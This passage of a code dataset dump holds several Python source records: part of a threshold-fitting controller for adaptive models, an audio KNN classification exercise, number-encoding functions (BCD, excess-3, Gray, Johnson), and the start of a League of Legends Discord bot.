The results\n                are 0/1 values indicating if this sample was classified correctly (1) or incorrectly (0)\n            clf_predictions: A [B, L] array of stop probabilities from the logistic regression model.\n            init_thresholds: A [S, L] array of initial threshold values.\n        \"\"\"\n        # Expand the clf predictions for later broadcasting\n        clf_predictions = np.expand_dims(clf_predictions, axis=0)  # [1, B, L]\n\n        # Copy the initial thresholds, [S, L] array\n        thresholds = np.copy(init_thresholds)\n        thresholds[:, -1] = 0\n\n        # The number 1 in fixed point representation\n        fp_one = 1 << self._precision\n\n        # Variable for convergence\n        early_stopping_counter = 0\n        prev_thresholds = np.copy(thresholds)\n\n        # Initialize penalty parameters; these anneal up to their final values over the first min_iter iterations\n        violation_factor = 1e-4\n        undershoot_factor = 1e-4\n\n        violation_anneal_rate = fit_anneal_rate(start_value=violation_factor, end_value=VIOLATION_FACTOR, steps=self._min_iter)\n        undershoot_anneal_rate = fit_anneal_rate(start_value=undershoot_factor, end_value=UNDERSHOOT_FACTOR, steps=self._min_iter)\n\n        for i in range(self._max_iter):\n\n            # Select a random level to run\n            level = self._rand.randint(low=0, high=self._num_levels - 1)\n\n            # [S] array of threshold values\n            best_t = np.copy(thresholds[:, level])  # The 'best' are the previous thresholds at this level\n            best_fitness = np.ones(shape=(self._num_budgets,), dtype=float)\n            best_power = np.zeros_like(best_fitness)\n            \n            # Create the start values to enable an interval of size [MARGIN] within [0, 1]\n            fp_init = (best_t * fp_one).astype(int)\n            end_values = np.minimum(fp_init + int((MARGIN + 1) / 2), fp_one)\n            start_values = np.maximum(end_values - MARGIN, 0)\n\n            for offset in range(MARGIN):\n\n                # Compute the predictions using the threshold on the logistic regression model\n                candidate_values = np.minimum((start_values + offset) / fp_one, 1)\n                thresholds[:, level] = candidate_values\n\n                # Compute the fitness\n                fitness, approx_power = self.fitness_function(thresholds=thresholds,\n                                                              network_results=network_results,\n                                                              clf_predictions=clf_predictions,\n                                                              batch_size=clf_predictions.shape[1],\n                                                              violation_factor=violation_factor,\n                                                              undershoot_factor=undershoot_factor)\n\n                best_t = np.where(fitness < best_fitness, candidate_values, best_t)\n                best_power = np.where(fitness < best_fitness, approx_power, best_power)\n                best_fitness = np.where(fitness < best_fitness, fitness, best_fitness)\n\n            thresholds[:, level] = best_t  # Set the best thresholds\n            print('Completed Iteration: {0}: level {1}'.format(i, level))\n            print('\\tBest Fitness: {0}'.format(-1 * best_fitness))\n            print('\\tApprox Power: {0}'.format(best_power))\n\n            if i >= self._min_iter and (np.isclose(thresholds, prev_thresholds)).all():\n                early_stopping_counter += 1\n            else:\n                early_stopping_counter = 0\n\n            if early_stopping_counter >= self._patience:\n                print('Converged.')\n                break\n\n            if i < self._min_iter:\n                violation_factor = violation_factor * violation_anneal_rate\n                undershoot_factor = undershoot_factor * undershoot_anneal_rate\n\n            prev_thresholds = np.copy(thresholds)\n\n        return thresholds\n\n\n### Model Controllers ###\n\nclass Controller:\n\n    def __init__(self, model_path: str,\n                 dataset_folder: str,\n                 share_model: bool,\n                 precision: int,\n                 budgets: List[float],\n                 trials: int,\n                 power: np.ndarray,\n                 budget_optimizer_type: str,\n                 patience: int,\n                 max_iter: int,\n                 min_iter: int):\n        self._model_path = model_path\n        self._dataset_folder = dataset_folder\n\n        # Load the model and dataset\n        model, dataset, _ = get_serialized_info(model_path, dataset_folder=dataset_folder)\n\n        self._model = model\n        self._dataset = dataset\n        self._is_fitted = False\n        self._share_model = share_model\n        self._num_levels = model.num_outputs\n\n        self._budgets = np.array(budgets)\n        self._num_budgets = len(self._budgets)\n        self._precision = precision\n        self._trials = trials\n        self._thresholds = None\n        self._patience = patience\n        self._max_iter = max_iter\n        self._min_iter = min_iter\n\n        self._power = get_power_for_levels(power, self._num_levels)\n\n        # Create the budget optimizer\n        self._budget_optimizer_type = budget_optimizer_type.lower()\n        if self._budget_optimizer_type == 'coordinate':\n            self._budget_optimizer = CoordinateOptimizer(num_levels=self._num_levels,\n                                                         budgets=self._budgets,\n                                                         precision=self._precision,\n                                                         trials=self._trials,\n                                                         patience=patience,\n                                                         max_iter=max_iter,\n                                                         min_iter=min_iter,\n                                                         power=self._power)\n        elif self._budget_optimizer_type == 'sim-anneal':\n            self._budget_optimizer = SimulatedAnnealingOptimizer(num_levels=self._num_levels,\n                                                                 budgets=self._budgets,\n                                                                 precision=self._precision,\n                                                                 trials=self._trials,\n                                                                 temp=0.1,\n                                                                 anneal_rate=0.95,\n                                                                 patience=patience,\n                                                                 max_iter=max_iter,\n                                                                 min_iter=min_iter,\n                                                                 power=self._power)\n        else:\n            raise ValueError('Unknown budget optimizer: {0}'.format(budget_optimizer_type))\n\n    def fit(self, series: DataSeries):\n        X_train, y_train, train_logits, train_labels, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n        X_test, y_test, test_logits, test_labels, test_clf_predictions = fetch_model_states(self._model, self._dataset, series=DataSeries.TEST)\n\n        # Fit the 
thresholds\n self._thresholds, self._avg_level_counts = self._budget_optimizer.fit(network_results=y_train, clf_predictions=clf_predictions)\n \n # Evaluate the model optimizer\n print('======')\n train_acc = self._budget_optimizer.evaluate(network_results=y_train, clf_predictions=clf_predictions)\n test_acc = self._budget_optimizer.evaluate(network_results=y_test, clf_predictions=test_clf_predictions)\n\n print('Train Accuracy: {0}'.format(train_acc))\n self._budget_optimizer.print_accuracy_for_levels(network_results=y_train, clf_predictions=clf_predictions, thresholds=self._thresholds)\n # level_errors(clf_predictions, self._thresholds, y_train)\n\n print('Test Accuracy: {0}'.format(test_acc))\n self._budget_optimizer.print_accuracy_for_levels(network_results=y_test, clf_predictions=test_clf_predictions, thresholds=self._thresholds)\n # level_errors(test_clf_predictions, self._thresholds, y_test)\n\n print('=====')\n\n # adjusted_thresholds = adjust_thresholds(test_clf_predictions, thresholds=self._thresholds, precision=self._precision, target_distribution=self._avg_level_counts)\n # print('Adjusted Test Accuracy:')\n # self._budget_optimizer.print_accuracy_for_levels(network_results=y_test, clf_predictions=test_clf_predictions, thresholds=adjusted_thresholds)\n\n self._is_fitted = True\n\n def score(self, series: DataSeries) -> np.ndarray:\n assert self._is_fitted, 'Model is not fitted'\n X, y, _, _, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n\n if self._share_model:\n X = X.reshape(-1, X.shape[-1])\n y = y.reshape(-1)\n\n accuracy = self._clf.score(X, y)\n else:\n total_accuracy = 0.0\n for level in range(self._model.num_outputs):\n total_accuracy += self._clf[level].score(X[:, level, :], y[:, level])\n\n accuracy = total_accuracy / self._model.num_outputs\n\n return accuracy\n\n def get_thresholds(self, budget: int) -> np.ndarray:\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n return self._thresholds[budget_idx]\n\n def get_avg_level_counts(self, budget: int) -> np.ndarray:\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n return self._avg_level_counts[budget_idx]\n\n def predict_sample(self, inputs: np.ndarray, budget: int, thresholds: Optional[np.ndarray] = None) -> int:\n \"\"\"\n Predicts the number of levels given the list of hidden states. The states are assumed to be in order.\n\n Args:\n inputs: An array of inputs for this sequence\n budget: The budget to perform inference under. This controls the employed thresholds.\n thresholds: Optional set of thresholds to use. 
This argument overrides the inferred thresholds.\n Returns:\n The number of levels to execute.\n \"\"\"\n assert self._is_fitted, 'Model is not fitted'\n\n # Get thresholds for this budget\n if thresholds is None:\n # Infer the thresholds for this budget\n thresholds = self.get_thresholds(budget)\n\n stop_output_ops = ['stop_output_{0}'.format(i) for i in range(self._model.num_outputs)]\n \n # Create the input feed dict\n seq_length = self._model.metadata[SEQ_LENGTH]\n num_sequences = self._model.num_sequences\n samples_per_seq = int(seq_length / num_sequences)\n feed_dict = dict()\n for i in range(self._model.num_outputs):\n input_ph = self._model.placeholders[get_input_name(i)]\n if self._model.model_type in (AdaptiveModelType.SAMPLE, AdaptiveModelType.BIDIR_SAMPLE, AdaptiveModelType.ADAPTIVE_NBOW):\n seq_indexes = list(range(i, seq_length, num_sequences))\n sample_tensor = inputs[seq_indexes]\n feed_dict[input_ph] = np.expand_dims(sample_tensor, axis=0) # Make batch size 1\n else: # Cascade\n start, end = i * samples_per_seq, (i+1) * samples_per_seq\n sample_tensor = inputs[start:end]\n feed_dict[input_ph] = np.expand_dims(sample_tensor, axis=0) # Make batch size 1\n\n # Supply dropout (needed for Adaptive NBOW)\n feed_dict[self._model.placeholders[DROPOUT_KEEP_RATE]] = 1.0\n\n model_result = self._model.execute(ops=stop_output_ops, feed_dict=feed_dict)\n for level, op_name in enumerate(stop_output_ops):\n stop_prob = model_result[op_name]\n\n if thresholds[level] < stop_prob:\n return level\n\n # By default, we return the top level\n return self._num_levels - 1\n\n def predict_levels(self, series: DataSeries, budget: float) -> Tuple[np.ndarray, np.ndarray]:\n assert self._is_fitted, 'Model is not fitted'\n\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n X, ypred, logits, _, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n level_predictions = np.argmax(logits, axis=-1) # [B, L]\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=self._thresholds)\n\n batch_idx = np.arange(level_predictions.shape[0])\n predictions = predictions_for_levels(model_predictions=level_predictions,\n levels=levels,\n batch_idx=batch_idx)\n\n return levels[budget_idx].astype(int), predictions[budget_idx].astype(int)\n\n def as_dict(self):\n return {\n 'budgets': self._budgets,\n 'thresholds': self._thresholds,\n 'trials': self._trials,\n 'is_fitted': self._is_fitted,\n 'model_path': self._model_path,\n 'dataset_folder': self._dataset_folder,\n 'share_model': self._share_model,\n 'precision': self._precision,\n 'patience': self._patience,\n 'max_iter': self._max_iter,\n 'min_iter': self._min_iter,\n 'budget_optimizer_type': self._budget_optimizer_type,\n 'avg_level_counts': self._avg_level_counts\n }\n\n def save(self, output_file: Optional[str] = None):\n \"\"\"\n Serializes the model into a pickle file.\n \"\"\"\n # Create a default file name if none is given\n if output_file is None:\n save_folder, model_path = os.path.split(self._model_path)\n model_name = extract_model_name(model_path)\n output_file = os.path.join(save_folder, CONTROLLER_PATH.format(model_name))\n\n # Save the model components\n save_pickle_gz(self.as_dict(), output_file)\n\n @classmethod\n def load(cls, save_file: str):\n \"\"\"\n Loads the controller from the given serialized file.\n \"\"\"\n # Load the serialized information.\n serialized_info = read_pickle_gz(save_file)\n\n # Initialize the new 
controller\n controller = Controller(model_path=serialized_info['model_path'],\n dataset_folder=serialized_info['dataset_folder'],\n share_model=serialized_info['share_model'],\n precision=serialized_info['precision'],\n budgets=serialized_info['budgets'],\n trials=serialized_info['trials'],\n budget_optimizer_type=serialized_info['budget_optimizer_type'],\n patience=serialized_info.get('patience', 10),\n max_iter=serialized_info.get('max_iter', 100),\n min_iter=serialized_info.get('min_iter', 20),\n power=POWER)\n\n # Set remaining fields\n controller._thresholds = serialized_info['thresholds']\n controller._avg_level_counts = serialized_info['avg_level_counts']\n controller._is_fitted = serialized_info['is_fitted']\n\n return controller\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--model-paths', type=str, nargs='+')\n parser.add_argument('--dataset-folder', type=str)\n parser.add_argument('--budgets', type=float, nargs='+')\n parser.add_argument('--precision', type=int, required=True)\n parser.add_argument('--trials', type=int, default=3)\n parser.add_argument('--patience', type=int, default=15)\n parser.add_argument('--max-iter', type=int, default=100)\n parser.add_argument('--min-iter', type=int, default=20)\n parser.add_argument('--budget-optimizer', type=str, choices=['coordinate', 'sim-anneal'])\n args = parser.parse_args()\n\n for model_path in args.model_paths:\n print('Starting model at {0}'.format(model_path))\n\n # Create the adaptive model\n controller = Controller(model_path=model_path,\n dataset_folder=args.dataset_folder,\n share_model=False,\n precision=args.precision,\n budgets=args.budgets,\n trials=args.trials,\n power=POWER,\n budget_optimizer_type=args.budget_optimizer,\n patience=args.patience,\n max_iter=args.max_iter,\n min_iter=args.min_iter)\n \n # Fit the model on the validation set\n controller.fit(series=DataSeries.VALID)\n controller.save()\n\n # print('Validation Accuracy: {0:.5f}'.format(controller.score(series=DataSeries.VALID))) \n # print('Test Accuracy: {0:.5f}'.format(controller.score(series=DataSeries.TEST)))\n","sub_path":"src/controllers/logistic_regression_controller.py","file_name":"logistic_regression_controller.py","file_ext":"py","file_size_in_byte":39966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
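Reading note: the controller record above leans heavily on levels_to_execute, which is defined earlier in the same file and only called here. As a reading aid, the following is a minimal NumPy reconstruction of its apparent contract, inferred from the loop in predict_sample (a sample exits at the first level whose stop probability exceeds that level's threshold, else it runs to the last level). The function name and toy arrays are illustrative assumptions, not the author's implementation.

import numpy as np

def levels_to_execute_sketch(logistic_probs, thresholds):
    # logistic_probs: [1, B, L] stop probabilities; thresholds: [S, L].
    # Returns an [S, B] array with the index of the level each sample exits at.
    exceeds = logistic_probs > np.expand_dims(thresholds, axis=1)  # [S, B, L]
    first_exceed = np.argmax(exceeds, axis=-1)   # index of the first True per row
    none_fired = ~np.any(exceeds, axis=-1)       # rows where no threshold was cleared
    return np.where(none_fired, thresholds.shape[1] - 1, first_exceed)

# Two budgets (rows of thresholds), three samples, three levels:
probs = np.array([[[0.3, 0.6, 0.9], [0.7, 0.2, 0.9], [0.1, 0.2, 0.3]]])
thresh = np.array([[0.5, 0.5, 0.0],   # permissive thresholds: exit early
                   [0.8, 0.8, 0.0]])  # strict thresholds: usually run to the end
print(levels_to_execute_sketch(probs, thresh))  # [[1 0 2] [2 2 2]]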
+{"seq_id":"536255893","text":"import window\nimport sklearn.model_selection\nimport sklearn.metrics\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport scipy.fftpack, scipy.signal\nimport scipy.io, scipy.io.wavfile, scipy.stats\nimport scipy.interpolate  # used by plot_test_classification below\n\n# possible feature transforms\n# you don't know what these do, but you can try applying them\n# and see how they affect the visualisations\nfeature_fns = {\n    \"dct\": lambda x: np.abs(scipy.fftpack.dct(x)),\n    \"fft\": lambda x: np.abs(scipy.fftpack.fft(x)),\n    \"fft_phase\": lambda x: np.angle(scipy.fftpack.fft(x)),\n    \"dct_phase\": lambda x: np.angle(scipy.fftpack.dct(x)),\n    \"cepstrum\": lambda x: np.abs(\n        scipy.fftpack.ifft(np.log(np.abs(scipy.fftpack.fft(x)) ** 2 + 1e-4))\n    )\n    ** 2,\n    \"raw\": lambda x: x,\n}\n\n# possible windowing functions\nwindow_fns = {\n    \"hamming\": scipy.signal.hamming,\n    \"hann\": scipy.signal.hann,\n    \"boxcar\": scipy.signal.boxcar,\n    \"blackmanharris\": scipy.signal.blackmanharris,\n}\n\n\ndef load_wav(fname):\n    sr, wave = scipy.io.wavfile.read(fname)\n    return wave / 32768.0\n\n\ndef load_features_window(data, size, step, window_fn, feature_fn, label, feature_range, decimate):\n\n    features = window.window_data(data, size=size, step=step)\n    labels = np.full(len(features), label)\n    print(f\"Loading into {len(features)} windows of length {size}\")\n\n    fn = feature_fns[feature_fn]\n    start_range = int(feature_range[0] * features.shape[1])\n    end_range = int(feature_range[1] * features.shape[1])\n    win = window_fns[window_fn](features.shape[1])\n    # apply feature transform and window fn\n    X = [fn(feature * win)[start_range:end_range:decimate] for feature in features]\n    X = np.array(X)\n    return X, labels\n\n\ndef load_data(kwargs):\n    X = []\n    y = []\n    for i in range(5):\n        fname = f\"data/challenge_train_{i}.wav\"\n        wave_data = load_wav(fname)\n        features, labels = load_features_window(\n            data=wave_data,\n            size=kwargs['size'],\n            step=kwargs['step'],\n            window_fn=kwargs['window_fn'],\n            feature_fn=kwargs['feature_fn'],\n            label=i,\n            feature_range=kwargs[\"feature_range\"],\n            decimate=kwargs[\"decimate\"]\n        )\n        X.append(features)\n        y.append(labels)\n\n    X = np.concatenate(X, axis=0)\n    y = np.concatenate(y, axis=0)\n    print(f\"Using {kwargs['feature_fn']} transform and a {kwargs['window_fn']} window.\") \n    return X, y\n\nimport sklearn.neighbors\n\n\ndef knn_fit(X, y):\n    knn = sklearn.neighbors.KNeighborsClassifier(n_neighbors=7)\n    knn.fit(X=X, y=y)\n    return knn\n\n\ndef knn_classify(knn, wave_data, kwargs):\n    \n    features, _ = load_features_window(\n        data=wave_data,\n        size=kwargs['size'],\n        step=kwargs['step'],\n        window_fn=kwargs['window_fn'],\n        feature_fn=kwargs['feature_fn'], \n        feature_range=kwargs[\"feature_range\"],\n        decimate=kwargs[\"decimate\"],\n        label=-1)\n    \n    \n    print(\"Predicting...\")\n    labels = knn.predict(features)\n    return labels\n\ndef load_test_wave_labels(basename):\n    # load the data from wavfile\n    wave = load_wav(basename + \".wav\")\n    labels = np.loadtxt(basename + \".labels\")\n    return wave, labels\n\n\ndef plot_test(knn, parameters, fname):\n    print(\"=\"*80)\n    print(f\"Testing with {fname}\")\n    wave, labels_true = load_test_wave_labels(fname)\n    labels_pred = knn_classify(knn, wave, parameters)\n    plot_test_classification(wave, labels_true, labels_pred)\n\ndef run_secret_test(knn, parameters):\n    import secret_test\n    classify = lambda wave: knn_classify(knn, wave, parameters)\n    secret_test.challenge_evaluate_performance(classify)\n\ndef 
plot_test_classification(wave_data, labels_true, labels_predicted):\n    ## plot the classification of wave_data (a 1D audio wave, sampled at the rate `sr` below)\n    ## and two sets of labels: true and predicted. They do not need\n    ## to be the same length, but they should represent equally-sampled\n    ## sections of the wave file\n    sr = 4096\n    ts = np.arange(len(wave_data)) / float(sr)\n\n    try:\n        len(labels_true)\n    except TypeError:\n        # a scalar label was passed in; wrap it in a list\n        labels_true = [labels_true]\n\n    # make sure there are at least 2 predictions, so interpolation does not freak out\n    if len(labels_predicted) == 1:\n        labels_predicted = [labels_predicted[0], labels_predicted[0]]\n    if len(labels_true) == 1:\n        labels_true = [labels_true[0], labels_true[0]]\n\n    # compare the label tracks every 80 samples (about 20ms at sr=4096)\n    frames = ts[::80]\n\n    true_inter = scipy.interpolate.interp1d(\n        np.linspace(0, np.max(ts), len(labels_true)), labels_true, kind=\"nearest\"\n    )\n    predicted_inter = scipy.interpolate.interp1d(\n        np.linspace(0, np.max(ts), len(labels_predicted)),\n        labels_predicted,\n        kind=\"nearest\",\n    )\n\n    true_interpolated = true_inter(frames)[:, None]\n    predicted_interpolated = predicted_inter(frames)[:, None]\n    # show colorblocks for the labels\n    plt.figure(figsize=(16, 4))\n    plt.imshow(\n        true_interpolated.T,\n        extent=[0, np.max(ts), 0, 1],\n        interpolation=\"nearest\",\n        cmap=\"tab10\",\n        vmin=0,\n        vmax=10,\n    )\n    plt.imshow(\n        predicted_interpolated.T,\n        extent=[0, np.max(ts), 0, -1],\n        interpolation=\"nearest\",\n        cmap=\"tab10\",\n        vmin=0,\n        vmax=10,\n    )\n\n    # plot the wave\n    plt.plot(ts, wave_data, c=\"w\", alpha=1)\n    plt.text(0.5, 0.5, \"True\", color=\"w\")\n    plt.text(0.5, -0.5, \"Predicted\", color=\"w\")\n    plt.grid(False)\n    plt.xlabel(\"Time(s)\")\n    plt.ylabel(\"Amplitude\") \n\n    print(f\"Prediction accuracy {sklearn.metrics.accuracy_score(true_interpolated, predicted_interpolated):.3f}\")\n    print(\"Confusion matrix\")\n    print(sklearn.metrics.confusion_matrix(true_interpolated, predicted_interpolated))\n    print()","sub_path":"Case_study3/audio_task.py","file_name":"audio_task.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
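The audio record above relies on window.window_data, a course-local helper that is not part of this file. A plausible sketch of that windowing step, plus the same seven-neighbour KNN flow on a synthetic two-tone signal, could look like the following; window_data_sketch, the tone frequencies, and the crude labels are all assumptions for illustration.

import numpy as np
import sklearn.neighbors

def window_data_sketch(data, size, step):
    # Slice a 1D signal into overlapping windows -> [N, size] array.
    starts = range(0, len(data) - size + 1, step)
    return np.stack([data[s:s + size] for s in starts])

# Synthetic signal: a 200 Hz tone followed by an 800 Hz tone at 4096 Hz.
t = np.arange(0, 2.0, 1 / 4096.0)
wave = np.concatenate([np.sin(2 * np.pi * 200 * t), np.sin(2 * np.pi * 800 * t)])
X = np.abs(np.fft.rfft(window_data_sketch(wave, size=512, step=256), axis=1))
y = (np.arange(len(X)) >= len(X) // 2).astype(int)  # crude labels: second half is class 1

knn = sklearn.neighbors.KNeighborsClassifier(n_neighbors=7).fit(X, y)
print(knn.score(X, y))  # training accuracy on the toy signal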
+{"seq_id":"190360683","text":"def b9876543210(valor): # Ok: one-hot '1 of 10' code, one ten-bit group per decimal digit\n    dec = int(valor/10)\n    uni = valor%10\n    if dec > 0:\n        resultado = 10*'0' + 10*dec*'0'\n        resultado = list(resultado)\n        resultado[(-dec*10)-uni-1] = '1'\n        resultado = ''.join(resultado)\n    else:\n        resultado = 10*'0'\n        resultado = list(resultado)\n        resultado[-uni-1] = '1'\n        resultado = ''.join(resultado)\n\n    return resultado\n\ndef bcd8642(valor): # Ok: plain binary per decimal digit\n    uni = valor%10\n    uni = bin(uni)\n    uni = uni[2:]\n    dec = int(valor/10)\n\n    if dec > 0:\n        resultado = bin(dec) + ' ' + uni\n        resultado = resultado[2:]\n    else:\n        resultado = uni\n\n    return resultado\n\ndef aiken(valor):\n    pass\n\ndef bcd8642v(valor):\n    pass\n\ndef ibm(valor): # Ok: like BCD, but 0 is encoded as 1010\n    uni = valor%10\n    if uni == 0:\n        uni = '1010'\n    else:\n        uni = bin(uni)\n        uni = uni[2:]\n    dec = int(valor/10)\n\n    if dec > 0:\n        resultado = bin(dec) + ' ' + uni\n        resultado = resultado[2:]\n    else:\n        resultado = uni\n\n    return resultado\n\ndef excesso3(valor): # Ok: excess-3 code, each digit encoded as digit + 3\n    uni = valor%10\n    uni = bin(uni)\n    uni = bin(int(uni,2)+3)\n\n    dec = int(valor/10)\n    if dec > 0:\n        dec = bin(dec)\n        dec = bin(int(dec,2)+3)\n        resultado = dec + ' ' + uni[2:]\n    else:\n        resultado = uni\n\n    return resultado[2:]\n\ndef gray(valor): # Ok: Gray code, adjacent binary bits XORed\n# https://www.youtube.com/watch?v=cF-Q5j7RUEw\n    bin_ori = bin(valor)\n    bin_ori = bin_ori[2:]\n    resultado = []\n    resultado.append(bin_ori[0])\n    for i in range(len(bin_ori)-1):\n        if bin_ori[i] == bin_ori[i+1]:\n            resultado.append('0')\n        else:\n            resultado.append('1')\n    resultado = ''.join(resultado)\n\n    return resultado\n\n\ndef johnson(valor): # Ok: Johnson (twisted-ring) counter code over a 50-bit register\n    if valor == 0: return '0'\n\n    resultado = 50*'0'\n    resultado = list(resultado)\n\n    if valor <= 50:\n        for i in range(valor):\n            resultado[-i-1] = '1'\n    else:\n        dif = valor - 50\n        for i in range(50):\n            resultado[-i-1] = '1'\n        for i in range(dif):\n            resultado[-i-1] = '0'\n\n    resultado = ''.join(resultado)\n\n    return resultado\n\n# print(function_name(value))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
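The gray() routine in the record above builds the Gray code by comparing adjacent bits of the binary string; the same mapping is more commonly written as the identity n ^ (n >> 1). A quick cross-check, assuming gray() from the record is in scope:

def gray_code(n):
    # Each Gray bit is the XOR of adjacent binary bits, which is exactly
    # what the string comparison in gray() computes.
    return bin(n ^ (n >> 1))[2:]

for v in range(1, 16):
    assert gray_code(v) == gray(v), v
print(gray_code(11))  # '1110'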
+{"seq_id":"373472699","text":"from discord.ext import commands\nfrom riotwatcher import LolWatcher, ApiError\nfrom analyze_good import ChampionData, ChampionBuild\nfrom datadragontest import Canvas\nimport pandas as pd\nfrom discord import role\nimport discord\nimport os\nimport sys, getopt\n\nclient = commands.Bot(command_prefix=\".\", help_command=None)\nkr = pd.read_csv('KR_DATA.csv')\neuw1 = pd.read_csv('EUW1_DATA.csv')\nna1 = pd.read_csv('NA1_DATA.csv')\nresult = [kr, euw1, na1]\ndf = pd.concat(result)\nVERSION = '11.14.1'\n\nwith open('api_key.txt', 'r') as f:\n    key = f.read().strip()  # read the key as a single string (readlines() would hand LolWatcher a list)\n    data_watcher = LolWatcher(key)\n\n\nchampions = data_watcher.data_dragon.champions(version=VERSION)['data']\n\nchamp_maps = {\n    266: [\"Aatrox\", \"aatrox\", \"AATROX\", 'atrox', 'atroz'],\n    103: [\"Ahri\", \"ahri\", \"AHRI\", 'ari'],\n    84: [\"Akali\", \"akali\", \"AKALI\", 'akali'],\n    12: [\"Alistar\", \"alistar\", \"ALISTAR\", 'alitar'],\n    32: [\"Amumu\", \"amumu\", \"AMUMU\", 'ammumu', 'amumu'],\n    34: [\"Anivia\", \"anivia\", \"ANIVIA\"],\n    1: [\"Annie\", \"annie\", \"ANNIE\", 'anni', 'ani', 'any', 'anny'],\n    523: [\"Aphelios\", \"aphelios\", \"APHELIOS\", 'afelios', 'apelios', 'ap'],\n    22: [\"Ashe\", \"ashe\", \"ASHE\", 'ache', 'a'],\n    136: [\"AurelionSol\", \"aurelionsol\", \"AURELIONSOL\", 'aurelion', 'sol', 'aurelion sol'],\n    268: [\"Azir\", \"azir\", \"AZIR\", 'asir', 'asur'],\n    432: [\"Bard\", \"bard\", \"BARD\", 'bardo', ],\n    53: [\"Blitzcrank\", \"blitzcrank\", \"BLITZCRANK\", 'blitz', 'blizcrank', 'blitzcrank'],\n    63: [\"Brand\", \"brand\", \"BRAND\", 'bran'],\n    201: [\"Braum\", \"braum\", \"BRAUM\"],\n    51: [\"Caitlyn\", \"caitlyn\", \"CAITLYN\", 'cait', 'caitlin'],\n    164: [\"Camille\", \"camille\", \"CAMILLE\", 'camile'],\n    69: [\"Cassiopeia\", \"cassiopeia\", \"CASSIOPEIA\", 'cassio', 'casio', 'cass', 'cassiopeia'],\n    31: [\"Chogath\", \"chogath\", \"CHOGATH\", 'chogat', 'shogat', \"cho'gath\", \"chogat\", \"cho'gat\"],\n    42: [\"Corki\", \"corki\", \"CORKI\", 'korki', 'corki', 'corqui', 'korki', 'koki'],\n    122: [\"Darius\", \"darius\", \"DARIUS\"],\n    131: [\"Diana\", \"diana\", \"DIANA\"],\n    119: [\"Draven\", \"draven\", \"DRAVEN\", 'draiven', 'draven'],\n    36: [\"DrMundo\", \"drmundo\", \"DRMUNDO\", 'dr mundo', 'mundo', 'dr'],\n    245: [\"Ekko\", \"ekko\", \"EKKO\", 'eko', 'ecco', 'eco', 'ecum'],\n    60: [\"Elise\", \"elise\", \"ELISE\", 'elyse', 'elisse'],\n    28: [\"Evelynn\", \"evelynn\", \"EVELYNN\", 'evelin', 'evelinn', 'eve'],\n    81: [\"Ezreal\", \"ezreal\", \"EZREAL\", 'ez'],\n    9: [\"Fiddlesticks\", \"fiddlesticks\", \"FIDDLESTICKS\", 'fiddle', 'fiddlestics', 'fidlestics', 'fidlesticks', 'fidol'],\n    114: [\"Fiora\", \"fiora\", \"FIORA\"],\n    105: [\"Fizz\", \"fizz\", \"FIZZ\", 'fis', 'fiz'],\n    3: [\"Galio\", \"galio\", \"GALIO\", 'nopelien', 'galo'],\n    41: [\"Gangplank\", \"gangplank\", \"GANGPLANK\", 'gp', 'gankplanc', 'gankplanck', 'ganplan'],\n    86: [\"Garen\", \"garen\", \"GAREN\"],\n    150: [\"Gnar\", \"gnar\", \"GNAR\", 'nar', 'gnarr'],\n    79: [\"Gragas\", \"gragas\", \"GRAGAS\"],\n    104: [\"Graves\", \"graves\", \"GRAVES\"],\n    887: [\"Gwen\", \"gwen\", \"GWEN\", 'wen', ':v', 'wuen'],\n    120: [\"Hecarim\", \"hecarim\", \"HECARIM\", 'ecarim', 'eca', 'heca', 'jeca'],\n    74: [\"Heimerdinger\", \"heimerdinger\", \"HEIMERDINGER\", 'heimerdinger', 'heimer', 'heimmer', 'heimmendinger'],\n    420: [\"Illaoi\", \"illaoi\", \"ILLAOI\", 'illa', 'iyaoi'],\n    39: 
[\"Irelia\", \"irelia\", \"IRELIA\"],\n 427: [\"Ivern\", \"ivern\", \"IVERN\"],\n 40: [\"Janna\", \"janna\", \"JANNA\"],\n 59: [\"JarvanIV\", \"jarvaniv\", \"JARVANIV\", 'jarvan', 'jarvis', 'jarvan cuarto', 'jarban'],\n 24: [\"Jax\", \"jax\", \"JAX\", 'jac'],\n 126: [\"Jayce\", \"jayce\", \"JAYCE\", 'jaise', 'jayse'],\n 202: [\"Jhin\", \"jhin\", \"JHIN\", 'jin'],\n 222: [\"Jinx\", \"jinx\", \"JINX\", 'jix', 'jincs'],\n 145: [\"Kaisa\", \"kaisa\", \"KAISA\", \"kai'sa\", 'kai sa'],\n 429: [\"Kalista\", \"kalista\", \"KALISTA\"],\n 43: [\"Karma\", \"karma\", \"KARMA\"],\n 30: [\"Karthus\", \"karthus\", \"KARTHUS\", 'kartus', 'khartus'],\n 38: [\"Kassadin\", \"kassadin\", \"KASSADIN\", 'kasadin'],\n 55: [\"Katarina\", \"katarina\", \"KATARINA\", 'kata', 'cata'],\n 10: [\"Kayle\", \"kayle\", \"KAYLE\", 'kayle'],\n 141: [\"Kayn\", \"kayn\", \"KAYN\"],\n 85: [\"Kennen\", \"kennen\", \"KENNEN\"],\n 121: [\"Khazix\", \"khazix\", \"KHAZIX\", 'k6', 'ksix', 'six', 'khasics', 'kasix'],\n 203: [\"Kindred\", \"kindred\", \"KINDRED\", 'kindre'],\n 240: [\"Kled\", \"kled\", \"KLED\"],\n 96: [\"KogMaw\", \"kogmaw\", \"KOGMAW\", 'kogmau', 'komau', 'kog mau', 'kog'],\n 7: [\"Leblanc\", \"leblanc\", \"LEBLANC\", 'leblanc', 'leb', 'leb blank'],\n 64: [\"LeeSin\", \"leesin\", \"LEESIN\", 'lisin', 'lee', 'lee sin', 